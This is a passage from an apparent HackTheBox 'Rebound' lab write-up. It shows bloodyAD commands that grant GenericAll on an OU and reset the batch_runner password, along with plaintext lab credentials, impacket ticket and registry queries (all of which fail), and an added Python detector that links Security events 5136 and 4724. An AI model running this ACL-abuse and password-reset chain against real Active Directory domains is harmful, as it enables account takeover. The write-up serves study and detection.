batch_runner


As discovered in the second BloodHound session, the batch_runner user might prove valuable, since the name suggests it executes automated scripts. However, the batch_runner account is not a member of the Remote Management Users group, so WinRM is not an option and I would have to find other ways to work with the account.

Since I have complete control over the Service Users OU, I can also change the password of the batch_runner account, much like I did with the winrm_svc account. The bloodyAD one-liner below first writes a GenericAll ACE for oorend onto the OU, so that it is inherited by the user objects beneath it, and then resets the password of the batch_runner object under that OU. Note that a password reset is a noisy and destructive action: it breaks anything that authenticates as batch_runner with the old password, and the DC logs the reset as Security event 4724 with oorend as the subject and batch_runner as the target.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=Service Users,DC=rebound,DC=htb' oorend ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password 'CN=batch_runner,OU=Service Users,DC=rebound,DC=htb' Qwer1234
[+] oorend has now GenericAll on OU=Service Users,DC=rebound,DC=htb
[+] Password changed successfully!
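From the defender's side, the two-step chain above (an ACE written onto the OU, then a password reset on an object beneath it) leaves a distinctive pair of Security events on the DC: 5136 (directory service object modified, with AttributeLDAPDisplayName nTSecurityDescriptor on the OU) followed by 4724 (an attempt was made to reset an account's password) from the same subject. The Python below is an added detection example; it is not part of this write-up or of bloodyAD. It runs over a constructed list of events shaped after those two event IDs: the OU and account names match the box, while the timestamps, record IDs and the USER_DN table (a stand-in for an LDAP lookup of sAMAccountName to distinguishedName) are made up.

```python
"""Correlate an OU ACL rewrite (event 5136) with a later password reset (event 4724)
by the same subject. Added example, not from the original write-up; all records are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SecEvent:
    record_id: int
    event_id: int        # 5136 = directory service object modified, 4724 = password reset attempted
    time: datetime
    subject: str         # SubjectUserName: who performed the action
    target: str          # 5136: ObjectDN of the modified object; 4724: TargetUserName (sAMAccountName)
    attribute: str = ""  # 5136 only: AttributeLDAPDisplayName


# Constructed stand-in for an LDAP lookup of sAMAccountName -> distinguishedName.
USER_DN = {
    "batch_runner": "CN=batch_runner,OU=Service Users,DC=rebound,DC=htb",
    "winrm_svc": "CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb",
    "jdoe": "CN=jdoe,CN=Users,DC=rebound,DC=htb",
}


def is_under(child_dn: str, parent_dn: str) -> bool:
    """True if child_dn lies (at any depth) beneath parent_dn. DNs compare case-insensitively."""
    child, parent = child_dn.lower(), parent_dn.lower()
    return child != parent and child.endswith("," + parent)


def find_acl_abuse_chains(events, window=timedelta(minutes=30)):
    """Return (acl_event, reset_event) pairs.

    A hit is a 5136 that rewrote nTSecurityDescriptor on an OU, followed within
    `window` by a 4724 from the same subject whose target user sits under that OU.
    """
    acl_changes = [
        e for e in events
        if e.event_id == 5136
        and e.attribute.lower() == "ntsecuritydescriptor"
        and e.target.lower().startswith("ou=")
    ]
    hits = []
    for acl in acl_changes:
        for reset in events:
            if reset.event_id != 4724 or reset.subject.lower() != acl.subject.lower():
                continue
            if not acl.time <= reset.time <= acl.time + window:
                continue
            target_dn = USER_DN.get(reset.target)
            if target_dn and is_under(target_dn, acl.target):
                hits.append((acl, reset))
    return hits


def describe(hit) -> str:
    """One-line analyst summary of a correlated pair."""
    acl, reset = hit
    delay = int((reset.time - acl.time).total_seconds())
    return (f"{acl.subject} rewrote the ACL of {acl.target} (record {acl.record_id}) "
            f"and reset {reset.target} {delay}s later (record {reset.record_id})")


# Constructed sample log: the write-up's chain plus decoys that must not match.
T0 = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    SecEvent(1, 5136, T0, "oorend", "OU=Service Users,DC=rebound,DC=htb", "nTSecurityDescriptor"),
    SecEvent(2, 4724, T0 + timedelta(seconds=5), "oorend", "batch_runner"),
    SecEvent(3, 4724, T0 + timedelta(minutes=3), "oorend", "winrm_svc"),
    SecEvent(4, 4724, T0 + timedelta(minutes=2), "helpdesk", "jdoe"),      # different subject, different OU
    SecEvent(5, 4724, T0 + timedelta(hours=2), "oorend", "batch_runner"),  # same subject, outside the window
    SecEvent(6, 5136, T0 + timedelta(minutes=10), "svc_admin",
             "CN=batch_runner,OU=Service Users,DC=rebound,DC=htb", "userAccountControl"),  # not an OU ACL change
]

if __name__ == "__main__":
    for hit in find_acl_abuse_chains(SAMPLE_EVENTS):
        print(describe(hit))
```

Two operational caveats: 5136 only fires when the Directory Service Changes audit subcategory is enabled and the OU carries a SACL covering Write DACL, and 4724 needs User Account Management auditing; without both, the chain is invisible in the Security log. The window is deliberately wide, since nothing forces the reset to follow the ACE within seconds.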

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT rebound.htb/batch_runner@dc01.rebound.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password:
[*] Saving ticket in batch_runner@dc01.rebound.htb.ccache

Done & confirmed

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> $Cred = New-Object System.Management.Automation.PSCredential("REBOUND\batch_runner", (ConvertTo-SecureString "Qwer1234" -AsPlainText -Force))
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock { whoami }
Connecting to remote server DC01 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
 
    + CategoryInfo          : OpenError: (DC01:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

Unfortunately, I am unable to run PowerShell's Invoke-Command cmdlet with the credential of the batch_runner account. The "Access is denied" error is consistent with batch_runner not being a member of Remote Management Users: the WinRM endpoint on DC01 refuses the account regardless of the password now being known. I will see if there is anything interesting in the registry, such as a logon script.

Registry


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-reg rebound.htb/batch_runner:Qwer1234@dc01.rebound.htb query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"   
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied 
 
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-reg rebound.htb/batch_runner:Qwer1234@dc01.rebound.htb query -keyName "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ScheduledTasks"              
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied 
 
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-reg rebound.htb/batch_runner:Qwer1234@dc01.rebound.htb query -keyName "HKLM\SYSTEM\CurrentControlSet\Services\Schedule"
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied 

Access denied on every key. Remote registry access over MS-RRP is gated by the ACL on HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg, which by default admits only Administrators, Backup Operators and LOCAL SERVICE, so a plain domain user such as batch_runner is refused before any key is read; the 0x5 therefore says nothing about whether the queried keys exist or what they contain (the preceding "Cannot check RemoteRegistry status" warning is the same story, since querying the service requires SCM access the account does not have). This appears to be a dead end.